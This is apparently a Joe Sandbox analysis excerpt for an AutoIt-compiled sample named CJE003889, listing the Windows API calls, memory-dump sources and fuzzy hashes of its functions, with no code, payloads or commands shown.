                                                          • Opcode Fuzzy Hash: 6d040088b9a98154605205d37a74f34877f324e46606264a9bb241f69a81266e
                                                          • Instruction Fuzzy Hash: 94F054B25403507AE6102B617D45F7B3A9CEF14355F004021BB08D52A5D7718C01C7B8
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?), ref: 00CC6BE6
                                                            • Part of subcall function 00CC76C4: _memset.LIBCMT ref: 00CC76F9
                                                          • _memmove.LIBCMT ref: 00CC6C09
                                                          • _memset.LIBCMT ref: 00CC6C16
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00CC6C26
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection_memset$EnterLeave_memmove
                                                          • String ID:
                                                          • API String ID: 48991266-0
                                                          • Opcode ID: 2e14bf0e7a1a161cc0ff5eb7e5956122a6caf13cb385e730a24cfcfd3cf54fbf
                                                          • Instruction ID: ed00ee435ae23f79eb28df13b8678075407d51b0af8e83190112dd9c0539b6bd
                                                          • Opcode Fuzzy Hash: 2e14bf0e7a1a161cc0ff5eb7e5956122a6caf13cb385e730a24cfcfd3cf54fbf
                                                          • Instruction Fuzzy Hash: 86F03A3A200100ABCF016F55DC85F8ABB29EF45324F048065FE089E227D731A911DBB4
                                                          APIs
                                                          • GetSysColor.USER32(00000008), ref: 00C62231
                                                          • SetTextColor.GDI32(?,000000FF), ref: 00C6223B
                                                          • SetBkMode.GDI32(?,00000001), ref: 00C62250
                                                          • GetStockObject.GDI32(00000005), ref: 00C62258
                                                          • GetWindowDC.USER32(?,00000000), ref: 00C9BE83
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C9BE90
                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00C9BEA9
                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00C9BEC2
                                                          • GetPixel.GDI32(00000000,?,?), ref: 00C9BEE2
                                                          • ReleaseDC.USER32(?,00000000), ref: 00C9BEED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                          • String ID:
                                                          • API String ID: 1946975507-0
                                                          • Opcode ID: 572243becc7ca4444be13a017ead3a7d97ab2527f19e9c72fedfcd82ac0296f0
                                                          • Instruction ID: 992761e0f8cf949ff19016514e8c158c56d3772be35c1959d2d3c6cc675870cf
                                                          • Opcode Fuzzy Hash: 572243becc7ca4444be13a017ead3a7d97ab2527f19e9c72fedfcd82ac0296f0
                                                          • Instruction Fuzzy Hash: 18E03932104288EAEF215FA4FC8D7DC3B25EB15332F00836AFA79480E187B14A81DB12
                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 00CB871B
                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00CB82E6), ref: 00CB8722
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00CB82E6), ref: 00CB872F
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00CB82E6), ref: 00CB8736
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CurrentOpenProcessThreadToken
                                                          • String ID:
                                                          • API String ID: 3974789173-0
                                                          • Opcode ID: e4ff322393bd8344cabd1b6847309b7a96002f5e7a0e1f7408077f6106367f24
                                                          • Instruction ID: ad71c317b055199e0c9c792b831280f4f5b0c3477ea74ba32c9c7f6e8a76599d
                                                          • Opcode Fuzzy Hash: e4ff322393bd8344cabd1b6847309b7a96002f5e7a0e1f7408077f6106367f24
                                                          • Instruction Fuzzy Hash: 88E086366122529BD7205FB06D8CB9E3BACEF50795F15882CB245DE050DA748546C750
                                                          APIs
                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 00CBB4BE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ContainedObject
                                                          • String ID: AutoIt3GUI$Container
                                                          • API String ID: 3565006973-3941886329
                                                          • Opcode ID: fd1acbd176a2e47c245bb4b3a41a6ac59b23b39e08e898ccf947341e55c57c56
                                                          • Instruction ID: 4bfb43acbd28273d364900c060b47a275f319bf0fd4383c2759889d136e072ed
                                                          • Opcode Fuzzy Hash: fd1acbd176a2e47c245bb4b3a41a6ac59b23b39e08e898ccf947341e55c57c56
                                                          • Instruction Fuzzy Hash: 5C912970600601AFDB64DF64C884AAAB7F5FF49710F20856DE94ACB2A1DBB1ED45CB60
                                                          APIs
                                                            • Part of subcall function 00C7FC86: _wcscpy.LIBCMT ref: 00C7FCA9
                                                            • Part of subcall function 00C69837: __itow.LIBCMT ref: 00C69862
                                                            • Part of subcall function 00C69837: __swprintf.LIBCMT ref: 00C698AC
                                                          • __wcsnicmp.LIBCMT ref: 00CCB02D
                                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CCB0F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                          • String ID: LPT
                                                          • API String ID: 3222508074-1350329615
                                                          • Opcode ID: 490f51a4e90bbc358b57f4cb745d1a2153fa9d69019c06a464c0a9fb8a60ece9
                                                          • Instruction ID: 7df9fae26c5961eee129045a27b6cfd30390123fe1148d174b9cc6a665de6be3
                                                          • Opcode Fuzzy Hash: 490f51a4e90bbc358b57f4cb745d1a2153fa9d69019c06a464c0a9fb8a60ece9
                                                          • Instruction Fuzzy Hash: 77617EB5A00219EFCB14DF94C892FAEB7B8EF08310F14406DF916AB291DB70AE44DB50
                                                          APIs
                                                          • Sleep.KERNEL32(00000000), ref: 00C72968
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C72981
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemorySleepStatus
                                                          • String ID: @
                                                          • API String ID: 2783356886-2766056989
                                                          • Opcode ID: 41ef0c9da6dd0f3b7b430d56451209de24e07048fa0a04e8adf4827fd7620a9a
                                                          • Instruction ID: 90e528c9cd0859b0b27e2a40f0531da41b80f81a5dce3d3880c9713be7b492ef
                                                          • Opcode Fuzzy Hash: 41ef0c9da6dd0f3b7b430d56451209de24e07048fa0a04e8adf4827fd7620a9a
                                                          • Instruction Fuzzy Hash: 8C5138714187449BD320EF10D886BAFBBECFB89344F41895DF2D8821A1DF318569DB66
                                                          APIs
                                                            • Part of subcall function 00C64F0B: __fread_nolock.LIBCMT ref: 00C64F29
                                                          • _wcscmp.LIBCMT ref: 00CC9824
                                                          • _wcscmp.LIBCMT ref: 00CC9837
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$__fread_nolock
                                                          • String ID: FILE
                                                          • API String ID: 4029003684-3121273764
                                                          • Opcode ID: cb94c7a64a2aed19557076a5e2b6d98b39eb0629c58ce3764ecf84fd134bacaa
                                                          • Instruction ID: 9d52256f86321f7563014acc562f435f7f24fef5ccab5b39e42f95e5472d0bfe
                                                          • Opcode Fuzzy Hash: cb94c7a64a2aed19557076a5e2b6d98b39eb0629c58ce3764ecf84fd134bacaa
                                                          • Instruction Fuzzy Hash: A041C671A00209BADF249AE4CC8AFEFBBBDDF85714F000469F904A7181DA71AA059B65
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CD259E
                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00CD25D4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: CrackInternet_memset
                                                          • String ID: |
                                                          • API String ID: 1413715105-2343686810
                                                          • Opcode ID: 8498b80604b78a0ceb76e45c90d1c6fb70401ac4579a9c8b92df5dbaf47ded11
                                                          • Instruction ID: fda1abc1e236158ad516ac6f2187267dd52ba038d294d059b1b1b1bea252c3c6
                                                          • Opcode Fuzzy Hash: 8498b80604b78a0ceb76e45c90d1c6fb70401ac4579a9c8b92df5dbaf47ded11
                                                          • Instruction Fuzzy Hash: 3A310C71800119EBCF11EFA1CC85EEEBFB8FF18314F10015AF915A6265EB319956EB60
                                                          APIs
                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00CE7B61
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CE7B76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: '
                                                          • API String ID: 3850602802-1997036262
                                                          • Opcode ID: 5f2fd28c19ae21dd6234a2fd9bca4a9bd1e5a8255926e91994527e927ed457d9
                                                          • Instruction ID: c63ea74c5a10ebe3e45a11f202dcd96f5bb0173213970fca36567a480b85d137
                                                          • Opcode Fuzzy Hash: 5f2fd28c19ae21dd6234a2fd9bca4a9bd1e5a8255926e91994527e927ed457d9
                                                          • Instruction Fuzzy Hash: 74413B74A043499FDB14CF65D980BEABBB9FF08300F10116AE904EB341E770AA51DF90
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00CE6B17
                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CE6B53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$DestroyMove
                                                          • String ID: static
                                                          • API String ID: 2139405536-2160076837
                                                          • Opcode ID: 0d3f0456482a32a9b750a56e4f9abbb319d34886a314913c185b6d6b681bc8a9
                                                          • Instruction ID: df281babce02f4eeeaec1c720285293d1dcb895df6c128f9b84eb13bf70ddd0a
                                                          • Opcode Fuzzy Hash: 0d3f0456482a32a9b750a56e4f9abbb319d34886a314913c185b6d6b681bc8a9
                                                          • Instruction Fuzzy Hash: 3A31BE71210244AFDB109F25CC81BFB73A9FF58760F108629F9A9D7190DB30AC81E760
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CC2911
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CC294C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 41ed8bdd48c414354ae5db515a02cdd284a417cf1a8e13f5469502890bddbfb2
                                                          • Instruction ID: b2c4e1a0e11d0346c87b775d8ad6ca3da57eb5bcfe690c67aba02619bc5d5156
                                                          • Opcode Fuzzy Hash: 41ed8bdd48c414354ae5db515a02cdd284a417cf1a8e13f5469502890bddbfb2
                                                          • Instruction Fuzzy Hash: FB31F631600305EFEB24EF58DC85FAEBBF8EF45354F14002DE995A61A0D7709A84DB51
                                                          APIs
                                                          • __snwprintf.LIBCMT ref: 00CD3A66
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __snwprintf_memmove
                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                          • API String ID: 3506404897-2584243854
                                                          • Opcode ID: 3bbaeaebdad02b6e382e2703fabbb940dd62cee7eb2ddcf3a2d17a2eaa9d40e7
                                                          • Instruction ID: 0f407dfd021c4803f271dbf797abd8cf35a946b595611c0fdb42f3cdbde44092
                                                          • Opcode Fuzzy Hash: 3bbaeaebdad02b6e382e2703fabbb940dd62cee7eb2ddcf3a2d17a2eaa9d40e7
                                                          • Instruction Fuzzy Hash: 0A218071700219BECF20EFA4DC81AAE77B5AF44700F100455E559A7281DB30EA45EB62
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CE6761
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CE676C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: Combobox
                                                          • API String ID: 3850602802-2096851135
                                                          • Opcode ID: 25d6fe3c075dcd745fc99efa384f0466e5abcfb0acb676d54f2309ed4e7d8341
                                                          • Instruction ID: 9459237493b2e012ddc26b595da606f8297e70064f3188c70aa7ef81a56367a2
                                                          • Opcode Fuzzy Hash: 25d6fe3c075dcd745fc99efa384f0466e5abcfb0acb676d54f2309ed4e7d8341
                                                          • Instruction Fuzzy Hash: D111B271210288AFEF218F55DC81EBB376AEB583A8F100129F92497290D6359D9187A0
                                                          APIs
                                                            • Part of subcall function 00C61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C61D73
                                                            • Part of subcall function 00C61D35: GetStockObject.GDI32(00000011), ref: 00C61D87
                                                            • Part of subcall function 00C61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C61D91
                                                          • GetWindowRect.USER32(00000000,?), ref: 00CE6C71
                                                          • GetSysColor.USER32(00000012), ref: 00CE6C8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                          • String ID: static
                                                          • API String ID: 1983116058-2160076837
                                                          • Opcode ID: 3b13a85ee91e3bae4efc305f0c8c14959ba3f29542053935d6d8c5b91493d849
                                                          • Instruction ID: eabc1c9e9139c1a526e2669e68b60b6ee767d839f4ee1b0c2a1f25e52f1bed4a
                                                          • Opcode Fuzzy Hash: 3b13a85ee91e3bae4efc305f0c8c14959ba3f29542053935d6d8c5b91493d849
                                                          • Instruction Fuzzy Hash: 24214472620249AFDF04DFA9CC85AEA7BA8FB18354F104628F996D2250E635E8519B60
                                                          APIs
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 00CE69A2
                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00CE69B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: LengthMessageSendTextWindow
                                                          • String ID: edit
                                                          • API String ID: 2978978980-2167791130
                                                          • Opcode ID: 8120cff0dca641315db73591ace7942f55427da5af2f36cab560a22de423eadc
                                                          • Instruction ID: ae10d7fe288a5216d17a665de1ad9fc868cbbf47f8977d07bedfcd54ea7927b7
                                                          • Opcode Fuzzy Hash: 8120cff0dca641315db73591ace7942f55427da5af2f36cab560a22de423eadc
                                                          • Instruction Fuzzy Hash: C2119D71120288ABEB108F669C80AAB3669EB253B8F104728F9B0971E1C731DC51A760
                                                          APIs
                                                          • _memset.LIBCMT ref: 00CC2A22
                                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00CC2A41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: abd4f387a0923dbcfdc05f356fb781f2ddc704007e5090724ecadb5b60e7ab0b
                                                          • Instruction ID: f850bae561505120997f4244ee834804c712b1a926a47180510456dbf72b1ec0
                                                          • Opcode Fuzzy Hash: abd4f387a0923dbcfdc05f356fb781f2ddc704007e5090724ecadb5b60e7ab0b
                                                          • Instruction Fuzzy Hash: 2411C832D05618ABDF30DB98DC44FAEB7B8AB45314F144039E865E7290D770AE06E7A1
                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00CD222C
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00CD2255
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: 717a27c3a26f984ac70c0f8aa9ade65a3b716abd00eb7b9642e3660e7da33e78
                                                          • Instruction ID: 6d0bdee0424c0d0f98f1907e8d7f68b8466a24713132493b7fd2f827e8ffd540
                                                          • Opcode Fuzzy Hash: 717a27c3a26f984ac70c0f8aa9ade65a3b716abd00eb7b9642e3660e7da33e78
                                                          • Instruction Fuzzy Hash: 90110270501265BEDB258F12CC84FFBFBA8FF26361F10822BFA2446200D2705A81D6F0
                                                          APIs
                                                            • Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22
                                                            • Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00CB8E73
                                                          Strings
                                                          Memory Dump Source
